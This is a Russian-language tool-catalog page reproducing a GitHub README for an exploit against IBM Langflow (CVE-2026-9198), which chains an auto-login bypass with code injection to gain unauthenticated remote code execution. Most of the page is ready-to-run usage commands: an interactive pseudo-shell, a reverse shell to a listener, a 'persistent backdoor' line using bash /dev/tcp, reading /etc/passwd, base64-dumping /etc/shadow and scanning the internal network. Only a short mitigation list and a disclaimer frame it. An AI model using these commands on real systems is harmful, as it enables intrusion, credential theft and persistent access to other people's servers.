Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-9198 — IBM Langflow Неаутентифицированное RCE через обход автологина | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеАутентификацияRed TeamingИнструмент Удаленного Доступа
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow Неаутентифицированное RCE через обход автологина

Репозиторий
127 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Логотип Langflow

🚨 CVE-2026-9198

Неаутентифицированное удалённое выполнение кода (RCE) в IBM Langflow OSS через обход автоматического входа

License: MIT Python 3.6+ Security


📋 Обзор

CVE-2026-9198 — это критическая неаутентифицированная уязвимость удалённого выполнения кода (RCE) в IBM Langflow OSS. Этот эксплойт объединяет две уязвимости:

  • CVE-2026-9103: обход автоматического входа, предоставляющий JWT-токены суперпользователя неаутентифицированным вызывающим
  • CVE-2026-8481: инъекция кода в конечной точке /api/v1/validate/code, позволяющая произвольное выполнение Python-кода

⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование незаконно.


🚀 Возможности

  • 🔓 Обход автоматического входа - автоматически получает JWT-токен суперпользователя
  • 💻 Интерактивный псевдо-shell - динамическое приглашение с именем пользователя и текущей директорией
  • 📝 Выполнение одиночных команд - запуск произвольных системных команд
  • 🔄 Реверс-шелл - доставка однострочной полезной нагрузки реверс-шелла
  • 🎨 Цветной вывод - визуальная обратная связь с помощью ANSI-цветов
  • ⚡ Быстрый и надёжный - создан с надёжной обработкой ошибок

📦 Установка

Предварительные требования

  • Python 3.6 или выше
  • менеджер пакетов pip

Шаг 1: Клонируйте репозиторий

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

Шаг 2: Установите зависимости

root@kitploit:~
pip install termcolor

Или установите все зависимости сразу:

root@kitploit:~
pip install -r requirements.txt

Шаг 3: Проверьте установку

root@kitploit:~
python CVE-2026-9198.py --help

Вы должны увидеть меню справки со всеми доступными опциями.


🎯 Использование

Базовое выполнение команд

Выполните одиночную команду на целевой системе:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

Пример:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

Интерактивный псевдо-shell

Запустите интерактивный shell с динамическими приглашениями:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

Возможности:

  • Динамическое приглашение с отображением user@host и текущей директории
  • Поддержка команды cd с автоматическим обновлением приглашения
  • История команд (зависит от терминала)
  • Чистое форматирование вывода

Пример сеанса:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

Реверс-шелл

Отправьте полезную нагрузку реверс-шелла на прослушиватель:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

Пример:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

Нестандартный порт

Если Langflow работает на нестандартном порту:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

Пример:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

Использование заранее полученного токена

Пропустите процесс автоматического входа и используйте существующий токен:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

Настройка тайм-аута

Настройте HTTP-тайм-аут для более медленных сетей:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 Аргументы командной строки


🔧 Примеры

1. Базовый сбор информации

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. Исследование файловой системы

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. Постоянный бэкдор

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. Сканирование сети (с целевой системы)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. Экфильтрация конфиденциальных файлов

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ Меры защиты

Чтобы защититься от этой уязвимости:

  1. Отключите автоматический вход в производственных средах
  2. Установите исправления, выпущенные IBM для Langflow
  3. Ограничьте сетевой доступ к административным интерфейсам Langflow
  4. Отслеживайте необычные API-запросы к /api/v1/auto_login и /api/v1/validate/code
  5. Используйте правила WAF для блокировки подозрительных шаблонов полезной нагрузки

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Пользователи несут единоличную ответственность за соблюдение применимых законов и нормативных актов.


📄 Лицензия

Этот проект лицензирован под лицензией MIT — подробности см. в файле LICENSE.


👨‍💻 Автор

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • Исследователь безопасности и пентестер

📚 Ссылки

  • Подробности CVE-2026-9198
  • CVE-2026-9103 - обход автоматического входа
  • CVE-2026-8481 - инъекция кода
  • Официальный сайт Langflow

🤝 Вклад в проект

Вклад приветствуется! Не стесняйтесь отправлять Pull Request.

  1. Сделайте форк репозитория
  2. Создайте ветку для вашей функции (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте ваши изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте изменения в ветку (git push origin feature/AmazingFeature)
  5. Откройте Pull Request

⭐ История звёзд

Если вы считаете этот инструмент полезным, пожалуйста, поставьте ему ⭐ на GitHub!


Сделано с ❤️ пользователем 0xgh057r3c0n
Скачать инструмент
АргументОписаниеОбязателенПо умолчанию
-t, --targetЦелевой хост/IP или полный URL✅ Да-
-p, --portПорт Langflow❌ Нет7860
-c, --cmdВыполнить одиночную команду❌ Нет"id"
--shellРежим интерактивного псевдо-shell❌ НетFalse
--lhostIP-адрес прослушивателя реверс-шелла❌ Нет-
--lportПорт прослушивателя реверс-шелла❌ Нет4444
-k, --tokenИспользовать предоставленный bearer-токен❌ Нет-
--timeoutHTTP-тайм-аут в секундах❌ Нет20
--no-bannerСкрыть баннер❌ НетFalse